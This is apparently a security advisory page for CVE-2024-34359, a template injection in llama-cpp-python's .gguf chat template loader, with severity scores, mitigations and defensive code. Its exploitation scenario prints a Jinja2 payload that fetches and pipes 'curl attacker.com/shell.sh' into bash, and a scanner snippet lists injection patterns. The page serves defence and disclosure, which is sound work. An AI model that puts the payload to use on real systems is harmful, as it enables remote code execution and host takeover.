CVE-2024-34359: llama-cpp-python: SSTI in .gguf loader enables RCE

CRITICAL PoC AVAILABLE CISA: ATTEND
Published May 14, 2024
CISO Take

Any system loading .gguf model files via llama-cpp-python is exposed to full host compromise through a crafted model metadata payload. An attacker only needs to get a malicious .gguf file loaded — via a shared model repo, supply chain substitution, or social engineering. Patch to >=0.2.72 immediately and restrict model sources to verified, internal registries.

What is the risk?

Critical exposure for all llama-cpp-python deployments running versions before 0.2.72. CVSS 9.6 with a network vector and low attack complexity means this is trivially weaponizable once a malicious .gguf is in circulation. The 'User Interaction Required' flag is misleading in AI/ML contexts: loading new models is routine workflow for developers, MLOps, and researchers, so it is practically no barrier. The changed scope (S:C) combined with high confidentiality, integrity, and availability impact (C:H/I:H/A:H) means full host takeover, not just model compromise. There is no evidence of active exploitation or a KEV listing at time of publication, but model-as-attack-vector is a maturing supply chain threat with a high probability of real-world abuse.

How severe is it?

CVSS 3.1
9.6 / 10
EPSS
28.4%
chance of exploitation in 30 days
Higher than 98% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Moderate
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
EPSS exploit prediction: 28%
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network
AC Low
PR None
UI Required
S Changed
C High
I High
A High

What should I do?

6 steps
  1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing.

  2. Source control: only load .gguf files from verified, internally-mirrored model registries — treat external model files as untrusted binaries.

  3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files.

  4. Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers).

  5. Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry.

  6. Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.
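
As a rough illustration of step 1, the installed release can be compared against the fixed version before any model is loaded. This is a minimal sketch, not an official check: the helper names `parse_release`, `is_patched`, and `installed_status` are hypothetical, and the comparison only looks at the leading numeric components, so pre-release tags such as `0.2.72rc1` would be treated as patched.

```python
from importlib.metadata import PackageNotFoundError, version

# First patched release named in the advisory (step 1).
FIXED = (0, 2, 72)


def parse_release(v: str) -> tuple:
    """Turn '0.2.71' or '0.2.72.post1' into a tuple of leading integers."""
    parts = []
    for piece in v.split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break  # stop at the first non-numeric component, e.g. 'post1'
        parts.append(int(digits))
    return tuple(parts)


def is_patched(v: str) -> bool:
    """True when the numeric release is at or above the fixed version."""
    return parse_release(v) >= FIXED


def installed_status(dist: str = "llama-cpp-python"):
    """Return (version, patched) for the installed package, or None if absent."""
    try:
        v = version(dist)
    except PackageNotFoundError:
        return None
    return v, is_patched(v)


if __name__ == "__main__":
    print(installed_status())
```

A check like this could run at service start-up or in CI so that an unpatched environment fails fast instead of loading a model.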

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
  • Article 15 - Accuracy, robustness and cybersecurity
  • Article 23 - Obligations of providers of general-purpose AI models
ISO 42001
  • A.6.2.5 - AI system security
  • A.8.1 - AI supplier relationships
NIST AI RMF
  • GOVERN 5.2 - AI supply chain and third-party risk management
  • MANAGE 2.4 - Risks from AI system components and dependencies
OWASP LLM Top 10
  • LLM03 - Supply Chain

Frequently Asked Questions

What is CVE-2024-34359?

CVE-2024-34359 is a server-side template injection (SSTI) vulnerability in llama-cpp-python, the Python bindings for llama.cpp. The library parses the chat template stored in a .gguf file's metadata with an unsandboxed Jinja2 environment, so a crafted model file can execute arbitrary code on the host that loads it. An attacker only needs to get a malicious .gguf file loaded, whether via a shared model repo, supply chain substitution, or social engineering. The issue is fixed in version 0.2.72.

Is CVE-2024-34359 actively exploited?

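There was no evidence of active exploitation at the time of publication, and CISA's SSVC assessment lists the exploitation status as PoC. Proof-of-concept exploit code is publicly available for CVE-2024-34359, which increases the risk of exploitation.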

How to fix CVE-2024-34359?

  1. Patch: upgrade llama-cpp-python to >=0.2.72 (commit b454f40a). This introduces a sandboxed Jinja2 environment for chat template parsing.

  2. Source control: only load .gguf files from verified, internally-mirrored model registries; treat external model files as untrusted binaries.

  3. Isolation: run inference processes as a dedicated low-privilege OS account inside a container with no network egress and read-only filesystem mounts for model files.

  4. Detection: monitor for unexpected child process spawning from Python inference processes (bash, sh, curl, wget launched by llama-cpp-python workers).

  5. Audit: inventory all .gguf files in use, verify their provenance and SHA256 against the source registry.

  6. Pipeline gate: add metadata inspection to CI/CD pipelines that scan .gguf chat_template fields for Jinja2 injection patterns before loading.
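
The audit in step 5 could be sketched roughly as follows. This assumes a manifest that maps each model's relative path to the SHA256 digest published by the source registry; the manifest format and the helper names `sha256_of` and `audit_models` are hypothetical and not part of any registry API.

```python
import hashlib
from pathlib import Path


def sha256_of(path, chunk_size=1 << 20):
    """Hash a file in chunks so multi-gigabyte models do not fill memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def audit_models(model_dir, manifest):
    """Compare every .gguf under model_dir against the expected digests.

    manifest: dict of relative POSIX path -> hex SHA256 (assumed format).
    Returns a dict of relative path -> 'ok', 'mismatch', or 'unknown'.
    """
    root = Path(model_dir)
    report = {}
    for p in sorted(root.rglob("*.gguf")):
        rel = p.relative_to(root).as_posix()
        expected = manifest.get(rel)
        if expected is None:
            report[rel] = "unknown"  # file with no recorded provenance
        elif sha256_of(p) == expected.lower():
            report[rel] = "ok"
        else:
            report[rel] = "mismatch"
    return report
```

Files reported as `unknown` or `mismatch` would be the ones to quarantine until their provenance is established.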

What systems are affected by CVE-2024-34359?

This vulnerability affects the following AI/ML architecture patterns: local LLM inference, model serving APIs, LLM application frameworks, AI development workstations, MLOps and CI/CD pipelines.

What is the CVSS score for CVE-2024-34359?

CVE-2024-34359 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 28.42%.

What is the AI security impact?

Affected AI Architectures

local LLM inference, model serving APIs, LLM application frameworks, AI development workstations, MLOps and CI/CD pipelines

MITRE ATLAS Techniques

AML.T0002.001 Models
AML.T0010.003 Model
AML.T0011.000 Unsafe AI Artifacts
AML.T0018.002 Embed Malware
AML.T0050 Command and Scripting Interpreter

Compliance Controls Affected

EU AI Act: Article 15, Article 23
ISO 42001: A.6.2.5, A.8.1
NIST AI RMF: GOVERN 5.2, MANAGE 2.4
OWASP LLM Top 10: LLM03

What are the technical details?

Original Advisory

llama-cpp-python provides the Python bindings for llama.cpp. `llama-cpp-python` depends on the `Llama` class in `llama.py` to load `.gguf` llama.cpp or Latency Machine Learning Models. The `__init__` constructor of `Llama` takes several parameters that configure how the model is loaded and run. Besides `NUMA, LoRa settings`, `loading tokenizers,` and `hardware settings`, `__init__` also loads the `chat template` from the target `.gguf` file's metadata and passes it to `llama_chat_format.Jinja2ChatFormatter.to_chat_handler()` to construct the `self.chat_handler` for this model. However, `Jinja2ChatFormatter` parses the `chat template` from the metadata with an unsandboxed `jinja2.Environment`, and the template is then rendered in `__call__` to construct the `prompt` for the interaction. This allows `jinja2` server-side template injection, which leads to remote code execution via a carefully constructed payload.
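
The difference between the two environment types can be illustrated with a harmless probe that only counts `object` subclasses and runs no commands. This is a sketch under stated assumptions: the advisory says only that the fix introduces a sandboxed Jinja2 environment, so the choice of `ImmutableSandboxedEnvironment` here is an assumption, and `PROBE`, `HAVE_JINJA2`, and `render_probe` are hypothetical names. It requires the third-party `jinja2` package.

```python
import importlib.util

# The sketch needs the third-party jinja2 package; record whether it is present.
HAVE_JINJA2 = importlib.util.find_spec("jinja2") is not None

# Harmless introspection chain: walks from a string to `object` and counts
# its subclasses. Real payloads use the same traversal to reach dangerous classes.
PROBE = "{{ ''.__class__.__base__.__subclasses__() | length }}"


def render_probe(sandboxed: bool):
    """Render PROBE and report whether the environment allowed the traversal."""
    from jinja2 import Environment
    from jinja2.exceptions import SecurityError
    from jinja2.sandbox import ImmutableSandboxedEnvironment

    env = ImmutableSandboxedEnvironment() if sandboxed else Environment()
    try:
        return "rendered", env.from_string(PROBE).render()
    except SecurityError as exc:
        # The sandbox refuses access to underscore-prefixed attributes.
        return "blocked", str(exc)


if __name__ == "__main__" and HAVE_JINJA2:
    print("plain environment:  ", render_probe(sandboxed=False))
    print("sandboxed environment:", render_probe(sandboxed=True))
```

In the plain environment the probe renders a subclass count, which shows that template code can reach arbitrary Python classes; in the sandboxed environment the same template is rejected.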

Exploitation Scenario

An adversary uploads a malicious .gguf model to Hugging Face under a convincing namespace (e.g., a typosquat of a popular model). The model's metadata contains a crafted chat_template field with a Jinja2 payload that exploits Python's object introspection: `{{ ''.__class__.__mro__[2].__subclasses__()[XXX]('curl attacker.com/shell.sh | bash', shell=True, ...) }}`. An ML engineer discovers the model via a search or dependency, pulls it for benchmarking, and calls `Llama(model_path='malicious.gguf')`. At instantiation, the template is read from the metadata and parsed in an unsandboxed environment; per the original advisory, it is rendered when the chat handler constructs a prompt, at which point the payload executes. The adversary receives a reverse shell on the inference host with the privileges of the Python process, gaining access to GPU resources, environment secrets, and internal APIs.
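
A pipeline gate for payloads of this shape could start with a simple pattern scan over the chat_template string. The sketch below is a heuristic under stated assumptions, not a complete detector: it assumes the template has already been extracted from the .gguf metadata by other means, the pattern list and the name `scan_chat_template` are hypothetical, and encoded or obfuscated payloads would evade it.

```python
import re

# Heuristic indicators of Jinja2 injection (illustrative, not exhaustive).
SUSPICIOUS_PATTERNS = {
    # Dunder traversal such as __class__, __mro__, __subclasses__.
    "dunder attribute": re.compile(r"__\w+__"),
    # The attr filter, sometimes used to avoid dotted attribute access.
    "attr filter": re.compile(r"\|\s*attr\s*\("),
    # Names commonly associated with command or code execution.
    "execution keyword": re.compile(r"\b(?:popen|subprocess|eval|exec)\b"),
}


def scan_chat_template(template: str):
    """Return a list of (label, matched_text) findings for a template string."""
    findings = []
    for label, pattern in SUSPICIOUS_PATTERNS.items():
        for match in pattern.finditer(template):
            findings.append((label, match.group(0)))
    return findings


if __name__ == "__main__":
    benign = "{% for m in messages %}{{ m['role'] }}: {{ m['content'] }}{% endfor %}"
    hostile = "{{ ''.__class__.__base__.__subclasses__() }}"
    print(scan_chat_template(benign))
    print(scan_chat_template(hostile))
```

A scan like this is best treated as an early warning alongside patching and sandboxing, since a template that passes the scan is not thereby proven safe.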

Weaknesses (CWE)

CWE-76 — Improper Neutralization of Equivalent Special Elements: The product correctly neutralizes certain special elements, but it improperly neutralizes equivalent special elements.

  • [Requirements] Programming languages and supporting technologies might be chosen which are not subject to these issues.
  • [Implementation] Utilize an appropriate mix of allowlist and denylist parsing to filter equivalent special element syntax from all input.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
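
For readers who want to see how this vector produces the 9.6 base score, the calculation can be reproduced with the metric weights and rounding rule from the CVSS v3.1 specification. The function names `roundup` and `base_score` are illustrative, and the sketch covers base metrics only.

```python
# Metric weights from the CVSS v3.1 specification (base metrics only).
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
# Privileges Required depends on whether scope is Unchanged or Changed.
PR = {
    "U": {"N": 0.85, "L": 0.62, "H": 0.27},
    "C": {"N": 0.85, "L": 0.68, "H": 0.5},
}


def roundup(x: float) -> float:
    """Round up to one decimal place, as defined in CVSS v3.1 Appendix A."""
    i = round(x * 100000)
    if i % 10000 == 0:
        return i / 100000.0
    return (i // 10000 + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a 'CVSS:3.1/...' vector string."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    scope = metrics["S"]
    iss = 1 - (1 - CIA[metrics["C"]]) * (1 - CIA[metrics["I"]]) * (1 - CIA[metrics["A"]])
    if scope == "C":
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    exploitability = (
        8.22 * AV[metrics["AV"]] * AC[metrics["AC"]]
        * PR[scope][metrics["PR"]] * UI[metrics["UI"]]
    )
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if scope == "C":
        total *= 1.08  # changed scope applies a 1.08 multiplier
    return roundup(min(total, 10))


if __name__ == "__main__":
    print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"))  # 9.6
```

With this vector the impact sub-score is about 6.05 and exploitability about 2.84; their sum times 1.08 is roughly 9.59, which rounds up to 9.6.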

Timeline

Published
May 14, 2024
Last Modified
November 21, 2024
First Seen
May 14, 2024

Related Vulnerabilities